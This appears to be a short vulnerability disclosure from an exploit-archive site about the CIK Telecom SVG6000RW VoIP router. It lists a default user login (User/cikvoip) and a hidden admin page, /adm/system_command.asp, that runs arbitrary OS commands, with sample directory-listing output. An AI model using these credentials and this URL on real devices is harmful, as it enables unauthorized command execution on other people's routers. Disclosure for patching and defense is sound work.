CIK Telecom SVG6000RW Default Account / Command Execution

2014.12.17

Credit: Chako

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-78

####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################
Description:
CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
and can lead to Command Execution.
Exploit:
1) Login as a normal user
Default Username: User Password:cikvoip
2) change URL to http://URL/adm/system_command.asp
and now u can run commands.
Example:
Command: ls /etc_rw/web
Result:
internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm

References:

https://www.ciktel.com/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CIK Telecom SVG6000RW Default Account / Command Execution

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.